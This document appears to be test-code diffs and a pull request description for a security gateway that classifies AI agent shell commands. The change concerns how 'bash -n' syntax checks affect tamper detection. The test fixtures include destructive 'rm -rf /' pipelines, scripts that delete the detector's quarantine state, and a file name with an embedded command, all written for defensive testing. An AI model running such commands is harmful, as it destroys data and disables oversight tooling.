+			requireNoExecScriptOwners(
+				t, facts, firstScript, secondScript, thirdScript,
+			)
 			signature := noExecScriptSemanticSignature(
 				facts,
 				firstScript,
@@ -1077,6 +1102,7 @@ func TestParsePOSIXNoExecScriptAndUnsafeCommandFailClosedAsASet(t *testing.T) {
 			if !noExecCommandExecute {
 				t.Fatalf("unsafe noexec -c did not retain execute carrier: %#v", facts.Commands)
 			}
+			requireNoExecScriptOwners(t, facts, script)
 			signature := noExecScriptSemanticSignature(facts, script)
 			if baseline == "" {
 				baseline = signature

--- a/internal/gateway/agent_hook_artifact_test.go
+++ b/internal/gateway/agent_hook_artifact_test.go
@@ -157,6 +157,10 @@ func TestPromotedArtifactHonorsPOSIXNoExecScriptMode(t *testing.T) {
 			name: "dash noexec re-enabled", invocation: "dash -n +n",
 			wantFinding: true, enforceable: true,
 		},
+		// For identity failures below, direct shell artifact candidates remain
+		// enforceable because the promoted script is analyzed separately and must
+		// be authoritative. Wrapper/nested candidates remain detection-only because
+		// promotedArtifactCandidateEnforcementEligible rejects them.
 		{
 			name: "mixed case bash", invocation: "Bash -n",
 			wantFinding: true, enforceable: true,

--- a/internal/gateway/agent_hook_artifact_test.go
+++ b/internal/gateway/agent_hook_artifact_test.go
@@ -120,12 +120,17 @@ func TestPromotedArtifactHonorsPOSIXNoExecScriptMode(t *testing.T) {
 	for _, test := range []struct {
 		name        string
 		invocation  string
+		wantFinding bool
 		enforceable bool
 	}{
 		{name: "bash short noexec", invocation: "bash -n"},
 		{name: "bash named noexec", invocation: "bash -o noexec"},
+		{name: "lowercase absolute bash", invocation: "/usr/bin/bash -n"},
 		{name: "sh noexec", invocation: "sh -n"},
 		{name: "dash noexec", invocation: "dash -n"},
+		{name: "lowercase env wrapper", invocation: "env bash -n"},
+		{name: "lowercase command wrapper", invocation: "command -- sh -n"},
+		{name: "lowercase exec wrapper", invocation: "exec dash -n"},
 		{name: "bash verbose noexec", invocation: "bash -nv"},
 		{name: "bash final verbose noexec", invocation: "bash +v -nv"},
 		{name: "bash named verbose noexec", invocation: "bash -o noexec -o verbose"},
@@ -136,10 +141,53 @@ func TestPromotedArtifactHonorsPOSIXNoExecScriptMode(t *testing.T) {
 		{name: "bash named verbose disabled", invocation: "bash -o noexec -o verbose +o verbose"},
 		{name: "sh verbose disabled", invocation: "sh -nv +v"},
 		{name: "dash verbose disabled", invocation: "dash -nv +v"},
-		{name: "bash short noexec re-enabled", invocation: "bash -n +n", enforceable: true},
-		{name: "bash named noexec re-enabled", invocation: "bash -o noexec +o noexec", enforceable: true},
-		{name: "sh noexec re-enabled", invocation: "sh -n +n", enforceable: true},
-		{name: "dash noexec re-enabled", invocation: "dash -n +n", enforceable: true},
+		{
+			name: "bash short noexec re-enabled", invocation: "bash -n +n",
+			wantFinding: true, enforceable: true,
+		},
+		{
+			name: "bash named noexec re-enabled", invocation: "bash -o noexec +o noexec",
+			wantFinding: true, enforceable: true,
+		},
+		{
+			name: "sh noexec re-enabled", invocation: "sh -n +n",
+			wantFinding: true, enforceable: true,
+		},
+		{
+			name: "dash noexec re-enabled", invocation: "dash -n +n",
+			wantFinding: true, enforceable: true,
+		},
+		{
+			name: "mixed case bash", invocation: "Bash -n",
+			wantFinding: true, enforceable: true,
+		},
+		{
+			name: "mixed case basename", invocation: "/usr/bin/Bash -n",
+			wantFinding: true, enforceable: true,
+		},
+		{
+			name: "mixed case directory", invocation: "/USR/bin/bash -n",
+			wantFinding: true, enforceable: true,
+		},
+		{name: "mixed case env wrapper", invocation: "Env bash -n", wantFinding: true},
+		{name: "mixed case env child", invocation: "env Bash -n", wantFinding: true},
+		{
+			name: "mixed case command wrapper", invocation: "Command -- sh -n",
+			wantFinding: true,
+		},
+		{name: "mixed case command child", invocation: "command -- Sh -n", wantFinding: true},
+		{name: "mixed case exec wrapper", invocation: "Exec dash -n", wantFinding: true},
+		{name: "mixed case exec child", invocation: "exec Dash -n", wantFinding: true},
+		{
+			name: "nested shell path", invocation: "/usr/bin/fake/bash -n",
+			wantFinding: true, enforceable: true,
+		},
+		{name: "nested env path", invocation: "/usr/bin/fake/env bash -n", wantFinding: true},
+		{
+			name: "nested command path", invocation: "/usr/bin/fake/command -- sh -n",
+			wantFinding: true,
+		},
+		{name: "nested exec path", invocation: "/usr/bin/fake/exec dash -n", wantFinding: true},
 	} {
 		t.Run(test.name, func(t *testing.T) {
 			facts := actionfacts.Analyze(actionfacts.Input{
@@ -151,7 +199,7 @@ func TestPromotedArtifactHonorsPOSIXNoExecScriptMode(t *testing.T) {
 				ConnectorName: connectorName,
 			}, facts, true)
 			matched := findingWithID(findings, "tamper.detector_state_write")
-			if !test.enforceable {
+			if !test.wantFinding {
 				if len(findings) != 0 {
 					t.Fatalf(
 						"no-exec script produced findings: %v facts=%+v",
@@ -161,12 +209,79 @@ func TestPromotedArtifactHonorsPOSIXNoExecScriptMode(t *testing.T) {
 				}
 				return
 			}
-			if matched == nil || !matched.contributesToEnforcement() {
+			if matched == nil || matched.contributesToEnforcement() != test.enforceable {
 				t.Fatalf(
-					"re-enabled script lost enforceable tamper finding: %v facts=%+v",
+					"executing script finding enforcement=%t want %t: %v facts=%+v",
+					matched != nil && matched.contributesToEnforcement(),
+					test.enforceable,
 					FindingStrings(findings),
 					facts,
 				)
+			}
+		})
+	}
+}
+
+func TestPromotedArtifactRevokesNoExecPreviewAfterConflictingSources(t *testing.T) {
+	requireNativePOSIXArtifactHost(t)
+	const connectorName = "artifact-noexec-conflict-test"
+	installDefaultProfileConnector(t, connectorName)
+	home := trustedSameHostHome()
+	if home == "" {
+		t.Skip("same-host home unavailable")
+	}
+	dir := t.TempDir()
+	script := filepath.Join(dir, "runner-cleanup.sh")
+	statePath := filepath.Join(
+		home, ".defenseclaw", "quarantine", "skills", "source-conflict",
+	)
+	if err := os.WriteFile(
+		script,
+		[]byte(fmt.Sprintf("#!/bin/sh\nrm -rf -- %q\n", statePath)),
+		0o700,
+	); err != nil {
+		t.Fatal(err)
+	}
+
+	for _, test := range []struct {
+		name    string
+		command string
+		argv    []string
+	}{
+		{
+			name:    "raw executes structured noexec",
+			command: fmt.Sprintf("bash %q", script),
+			argv:    []string{"bash", "-n", script},
+		},
+		{
+			name:    "raw noexec structured executes",
+			command: fmt.Sprintf("bash -n %q", script),
+			argv:    []string{"bash", script},
+		},
+	} {
+		test := test
+		t.Run(test.name, func(t *testing.T) {
+			facts := actionfacts.Analyze(actionfacts.Input{
+				Tool: "shell", Command: test.command, Argv: test.argv,
+				CWD: dir, ActiveHome: home, DialectHint: actionfacts.DialectPOSIX,
+			})
+			if facts.Parse.Status == actionfacts.StatusComplete || facts.Authoritative() {
+				t.Fatalf("conflicting sources stayed authoritative: %+v", facts)
+			}
+			for _, command := range facts.Commands {
+				if command.Effect == actionfacts.EffectPreview {
+					t.Fatalf("conflicting sources retained preview: %+v", facts)
+				}
+			}
+			findings := promotedArtifactFindings(t.Context(), agentHookRequest{
+				ConnectorName: connectorName,
+			}, facts, true)
+			matched := findingWithID(findings, "tamper.detector_state_write")
+			if matched == nil {
+				t.Fatalf("source conflict lost tamper finding: %v facts=%+v", FindingStrings(findings), facts)
+			}
+			if matched.contributesToEnforcement() {
+				t.Fatalf("source-conflict artifact unexpectedly enforceable: %+v", *matched)
 			}
 		})
 	}

--- a/internal/gateway/agent_hook_artifact_test.go
+++ b/internal/gateway/agent_hook_artifact_test.go
@@ -6,6 +6,7 @@
 package gateway
 
 import (
+	"encoding/json"
 	"fmt"
 	"os"
 	"path/filepath"
@@ -91,6 +92,226 @@ func TestPromotedArtifactFindingsBlocksOnlyAuthoritativeFinalBytes(t *testing.T)
 				)
 			}
 		})
+	}
+}
+
+func TestPromotedArtifactHonorsPOSIXNoExecScriptMode(t *testing.T) {
+	requireNativePOSIXArtifactHost(t)
+	const connectorName = "artifact-noexec-script-test"
+	installDefaultProfileConnector(t, connectorName)
+	home := trustedSameHostHome()
+	if home == "" {
+		t.Skip("same-host home unavailable")
+	}
+	dir := t.TempDir()
+	path := filepath.Join(dir, "runner-cleanup.sh")
+	statePath := filepath.Join(
+		home,
+		".defenseclaw",
+		"quarantine",
+		"skills",
+		"e2e-stale",
+	)
+	body := fmt.Sprintf("#!/bin/sh\nrm -rf -- %q\n", statePath)
+	if err := os.WriteFile(path, []byte(body), 0o700); err != nil {
+		t.Fatal(err)
+	}
+
+	for _, test := range []struct {
+		name        string
+		invocation  string
+		enforceable bool
+	}{
+		{name: "bash short noexec", invocation: "bash -n"},
+		{name: "bash named noexec", invocation: "bash -o noexec"},
+		{name: "sh noexec", invocation: "sh -n"},
+		{name: "dash noexec", invocation: "dash -n"},
+		{name: "bash verbose noexec", invocation: "bash -nv"},
+		{name: "bash final verbose noexec", invocation: "bash +v -nv"},
+		{name: "bash named verbose noexec", invocation: "bash -o noexec -o verbose"},
+		{name: "bash long verbose noexec", invocation: "bash --verbose -n"},
+		{name: "sh verbose noexec", invocation: "sh -nv"},
+		{name: "dash verbose noexec", invocation: "dash -nv"},
+		{name: "bash verbose disabled", invocation: "bash -nv +v"},
+		{name: "bash named verbose disabled", invocation: "bash -o noexec -o verbose +o verbose"},
+		{name: "sh verbose disabled", invocation: "sh -nv +v"},
+		{name: "dash verbose disabled", invocation: "dash -nv +v"},
+		{name: "bash short noexec re-enabled", invocation: "bash -n +n", enforceable: true},
+		{name: "bash named noexec re-enabled", invocation: "bash -o noexec +o noexec", enforceable: true},
+		{name: "sh noexec re-enabled", invocation: "sh -n +n", enforceable: true},
+		{name: "dash noexec re-enabled", invocation: "dash -n +n", enforceable: true},
+	} {
+		t.Run(test.name, func(t *testing.T) {
+			facts := actionfacts.Analyze(actionfacts.Input{
+				Tool:    "shell",
+				Command: fmt.Sprintf("%s %q", test.invocation, path),
+				CWD:     dir,
+			})
+			findings := promotedArtifactFindings(t.Context(), agentHookRequest{
+				ConnectorName: connectorName,
+			}, facts, true)
+			matched := findingWithID(findings, "tamper.detector_state_write")
+			if !test.enforceable {
+				if len(findings) != 0 {
+					t.Fatalf(
+						"no-exec script produced findings: %v facts=%+v",
+						FindingStrings(findings),
+						facts,
+					)
+				}
+				return
+			}
+			if matched == nil || !matched.contributesToEnforcement() {
+				t.Fatalf(
+					"re-enabled script lost enforceable tamper finding: %v facts=%+v",
+					FindingStrings(findings),
+					facts,
+				)
+			}
+		})
+	}
+}
+
+func TestPOSIXNoExecArtifactPipelineRetainsFinding(t *testing.T) {
+	requireNativePOSIXArtifactHost(t)
+	const connectorName = "artifact-noexec-pipeline-test"
+	installDefaultProfileConnector(t, connectorName)
+	home := trustedSameHostHome()
+	if home == "" {
+		t.Skip("same-host home unavailable")
+	}
+	dir := t.TempDir()
+	path := filepath.Join(dir, "bad\nprintf SAFE_FILENAME_MARKER\n#")
+	statePath := filepath.Join(
+		home, ".defenseclaw", "quarantine", "skills", "e2e-stale",
+	)
+	if err := os.WriteFile(
+		path,
+		[]byte(fmt.Sprintf("#!/bin/sh\nrm -rf -- %q\n(\n", statePath)),
+		0o700,
+	); err != nil {
+		t.Fatal(err)
+	}
+
+	for _, test := range []struct {
+		name   string
+		format string
+	}{
+		{name: "bash", format: "bash -n '%s' 2>/dev/stdout | bash"},
+		{name: "bash verbose", format: "bash -nv '%s' 2>/dev/stdout | bash"},
+		{name: "sh", format: "sh -n '%s' 2>/dev/stdout | bash"},
+		{name: "dash verbose", format: "dash -nv '%s' 2>/dev/stdout | bash"},
+		{name: "env bash", format: "env bash -n '%s' 2>/dev/stdout | bash"},
+		{name: "command sh", format: "command -- sh -n '%s' 2>/dev/stdout | bash"},
+		{name: "exec dash", format: "exec dash -n '%s' 2>/dev/stdout | bash"},
+		{name: "subshell", format: "(bash -n '%s') 2>/dev/stdout | bash"},
+		{name: "block", format: "{ bash -n '%s'; } 2>/dev/stdout | bash"},
+	} {
+		t.Run(test.name, func(t *testing.T) {
+			command := fmt.Sprintf(test.format, path)
+			facts := actionfacts.Analyze(actionfacts.Input{
+				Tool: "shell", Command: command, CWD: dir, ActiveHome: home,
+			})
+			findings := promotedArtifactFindings(t.Context(), agentHookRequest{
+				ConnectorName: connectorName,
+			}, facts, true)
+			matched := findingWithID(findings, "tamper.detector_state_write")
+			if matched == nil {
+				t.Fatalf("no-exec pipeline lost tamper finding: %v facts=%+v", FindingStrings(findings), facts)
+			}
+			if matched.contributesToEnforcement() {
+				t.Fatalf("pipeline artifact unexpectedly became enforceable: %+v", *matched)
+			}
+		})
+	}
+}
+
+func TestPOSIXNoExecCommandPipelineRetainsFinding(t *testing.T) {
+	const connectorName = "noexec-command-pipeline-test"
+	installDefaultProfileConnector(t, connectorName)
+	for _, test := range []struct {
+		name    string
+		command string
+	}{
+		{name: "bash", command: `bash -n -c 'rm -rf /' 2>&1 | bash`},
+		{name: "bash verbose", command: `bash -nv -c 'rm -rf /' 2>&1 | bash`},
+		{name: "env bash", command: `env bash -n -c 'rm -rf /' 2>&1 | bash`},
+		{name: "command sh", command: `command -- sh -n -c 'rm -rf /' 2>&1 | bash`},
+		{name: "exec dash", command: `exec dash -n -c 'rm -rf /' 2>&1 | bash`},
+	} {
+		t.Run(test.name, func(t *testing.T) {
+			args, err := json.Marshal(map[string]string{"command": test.command})
+			if err != nil {
+				t.Fatal(err)
+			}
+			for _, input := range []actionfacts.Input{
+				{Tool: "shell", Command: test.command, CWD: "/repo"},
+				{Tool: "Bash", Args: args, CWD: "/repo"},
+			} {
+				findings := dispatchTrustedAction(t.Context(), trustedActionRequest{
+					Input: input, LegacyText: test.command, Connector: connectorName,
+					EnforcementCapable: true,
+				})
+				if findingWithID(findings, "CMD-RM-RF") == nil {
+					t.Fatalf("no-exec command pipeline lost finding: %v", FindingStrings(findings))
+				}
+			}
+		})
+	}
+}
+
+func TestPOSIXNoExecScriptRedirectRetainsStateMutationDetection(t *testing.T) {
+	requireNativePOSIXArtifactHost(t)
+	const connectorName = "artifact-noexec-redirect-test"
+	installDefaultProfileConnector(t, connectorName)
+	home := trustedSameHostHome()
+	if home == "" {
+		t.Skip("same-host home unavailable")
+	}
+	dir := t.TempDir()
+	script := filepath.Join(dir, "runner-cleanup.sh")
+	if err := os.WriteFile(script, []byte("#!/bin/sh\nprintf safe\n"), 0o700); err != nil {
+		t.Fatal(err)
+	}
+	target := filepath.Join(
+		home,
+		".defenseclaw",
+		"quarantine",
+		"skills",
+		"redirected-output",
+	)
+	command := fmt.Sprintf("bash -n %q > %q", script, target)
+	input := actionfacts.Input{
+		Tool: "shell", Command: command, CWD: dir, ActiveHome: home,
+	}
+	facts := actionfacts.Analyze(input)
+	sawScriptExecute := false
+	sawTargetWrite := false
+	for _, path := range facts.Paths {
+		sawScriptExecute = sawScriptExecute || path.Access == actionfacts.PathAccessExecute &&
+			semanticPathValue(path) == canonicalSemanticPath(script)
+		sawTargetWrite = sawTargetWrite || path.Access == actionfacts.PathAccessWrite &&
+			semanticPathValue(path) == canonicalSemanticPath(target)
+	}
+	if facts.Parse.Status != actionfacts.StatusPartial || facts.Authoritative() ||
+		!sawScriptExecute || !sawTargetWrite {
+		t.Fatalf("no-exec redirect facts=%+v", facts)
+	}
+	if findings := promotedArtifactFindings(
+		t.Context(),
+		agentHookRequest{ConnectorName: connectorName},
+		facts,
+		true,
+	); len(findings) != 0 {
+		t.Fatalf("safe redirected script produced artifact findings: %v", FindingStrings(findings))
+	}
+	findings := dispatchTrustedAction(t.Context(), trustedActionRequest{
+		Input: input, LegacyText: command, Connector: connectorName,
+		EnforcementCapable: true,
+	})
+	matched := findingWithID(findings, "tamper.detector_state_write")
+	if matched == nil || matched.contributesToEnforcement() {
+		t.Fatalf("redirect lost fallback tamper finding: %v", FindingStrings(findings))
 	}
 }
 


### PR DESCRIPTION
> Base note: this change is rebased onto exact `main` commit `334e15d082c0f90f7ec2b1eede17e0b470984229`. It fixes #739, builds on the POSIX invocation parser introduced by #668, and is distinct from #713's inline-wrapper work.

## Problem

Standalone POSIX shell syntax checks such as `bash -n script.sh`, `sh -n script.sh`, and `dash -n script.sh` read and parse a script without executing it. ActionFacts nevertheless published the selected script as `PathAccessExecute` plus an opaque executable artifact. Gateway artifact promotion then scanned legitimate script-body text and could emit unrelated HIGH tamper findings.

## Current Situation

The shared shell-invocation parser already tracks ordered noexec state, but script-file mode did not use that proof. Inline command mode also assigned preview before the complete command graph and final merged Facts status were known, making suppression depend on command order and source conflicts.

Argv alone is not enough to suppress safely: inherited shell settings and ordinary syntax diagnostics can emit script-related bytes. A pipeline, redirect, compound shell context, or nontransparent parent can route those bytes into another action.

## Solution

### Decide every noexec preview transactionally

Noexec candidates are deferred while all other commands are classified. Only after that pass completes does one set-wide decision classify every candidate as preview or every candidate as execute/fallback. One unsafe candidate therefore prevents partial suppression, regardless of source order.

A final revocation pass runs after raw/structured/tool facts are merged. If the final result is not complete, every exact noexec preview is restored to execute semantics before bounded path work: script reads become execute paths with opaque artifacts, and inline command forms become unsupported fallback without expanding their body.

### Require exact isolated ownership

A bounded, canonical ID-indexed ancestry walk requires no pipeline or redirect on the command or any ancestor, and only exact transparent `env`, `command`, or `exec` wrappers whose nested argv exactly matches the child. Missing, duplicate, zero, forged, or cyclic ancestry fails closed.

Absolute executable owners are limited to direct system directories (`/bin`, `/sbin`, `/usr/bin`, `/usr/sbin`) with exact case and argv identity. Lowercase bare owners remain supported under the existing trusted inherited POSIX command-resolution/PATH boundary.

### Represent standalone syntax checks as preview/read

A valid final-noexec script invocation becomes `EffectPreview` with `PathAccessRead`, and no opaque executable artifact, only when the complete final action is structurally isolated. Existing noexec inline-command handling uses the same contract. Raw commands, structured argv, and standalone transparent wrappers agree.

Any pipeline, redirect, compound context, re-enabled execution, source conflict, capacity failure, malformed operand index, or uncertain ancestry remains execute/partial/opaque/fallback.

```mermaid
flowchart TD
    A["POSIX noexec candidates"] --> B["Classify every non-candidate"]
    B --> C{"All candidates isolated and parse complete?"}
    C -->|"Yes"| D["All candidates: preview plus script read"]
    C -->|"No"| E["All candidates: execute or opaque fallback"]
    D --> F{"Final merged Facts still complete?"}
    F -->|"Yes"| G["No script artifact promotion"]
    F -->|"No"| E
    E --> H["Existing artifact and action detection"]
```

Closes #739.

## What Changed (Where & How)

| Path | Change |
|---|---|
| `internal/actionfacts/analyze.go` | Defers all noexec candidates, makes one order-independent classification decision, proves exact ancestry, and revokes previews after final fact merging. |
| `internal/actionfacts/classify.go` | Publishes proven script previews as reads and rejects malformed script operand indexes fail closed. |
| `internal/actionfacts/posix.go` | Defers raw command-mode preview and preserves connected-output fallback. |
| `internal/actionfacts/posix_shell_invocation_test.go` | Covers parser state, exact wrappers, malformed IDs and indexes, redirects, pipelines, and cycles. |
| `internal/actionfacts/posix_test.go` | Covers Bash/sh/dash, source order, multi-candidate transactions, capacity and merge conflicts, identity boundaries, raw/structured/wrapper parity, and compound diagnostic pipelines. |
| `internal/gateway/agent_hook_artifact_test.go` | Proves standalone syntax checks stop artifact noise while connected, conflicted, and malformed forms retain findings. |

## Breaking Changes

None for APIs, configuration, defaults, or operator workflow.

Detection behavior is intentionally refined only for proven standalone noexec inspection. Connected, conflicted, malformed, or uncertain forms retain conservative detection.

## Open Issues / Follow-ups

None.

## Test Plan

Validated on binary diff SHA-256 `e6c75f95bc74a11a6c3d25469173d8de6dcae007c85404967608867ad116154f` (6 files, +1772/-25) from exact base `334e15d082c0f90f7ec2b1eede17e0b470984229` to exact head `7cc10290ab2a494bad692c0a2c1715ccb944c14b`.

```text
git diff --check
PASS

gofmt -l <six changed Go files>
PASS (no output)

go test ./internal/actionfacts -run 'NoExec|POSIXShellInvocation|IsolatedPOSIXCommand|ExactCaseSensitivePOSIXProgram|ShellScriptOperand' -count=1
PASS (0.290s; isolated clean cache)

go test ./internal/gateway -run '^(TestPromotedArtifactHonorsPOSIXNoExecScriptMode|TestPromotedArtifactRevokesNoExecPreviewAfterConflictingSources|TestPOSIXNoExecArtifactPipelineRetainsFinding|TestPOSIXNoExecCommandPipelineRetainsFinding|TestPOSIXNoExecScriptRedirectRetainsStateMutationDetection)$' -count=1
PASS (1.089s; isolated clean cache)

go test -race ./internal/actionfacts -run 'NoExec|POSIXShellInvocation|ShellScriptOperand' -count=1
PASS (1.305s)

go test -race ./internal/gateway -run 'NoExec|PromotedArtifactHonorsPOSIXNoExecScriptMode' -count=1
PASS (4.008s)

go test ./internal/actionfacts -count=1
PASS (0.288s)

go vet ./internal/actionfacts ./internal/gateway
PASS

go test ./internal/gateway -count=1
PASS (174.239s)
```

An independent exact-diff audit of head `4755d861d9f8a969e94f10a740fee698562f3a0e` reproduced hash `68b880159d81ab7fd881d3039177300fb6fbb149140815d8edd968f119b29007`, verified the production semantics and regression matrix, and returned CLEAN with no actionable findings.

Final review-only commit `7cc10290ab2a494bad692c0a2c1715ccb944c14b` changes only test fixtures, test assertions, and an explanatory test comment; the focused ActionFacts and gateway suites above passed on that exact head.
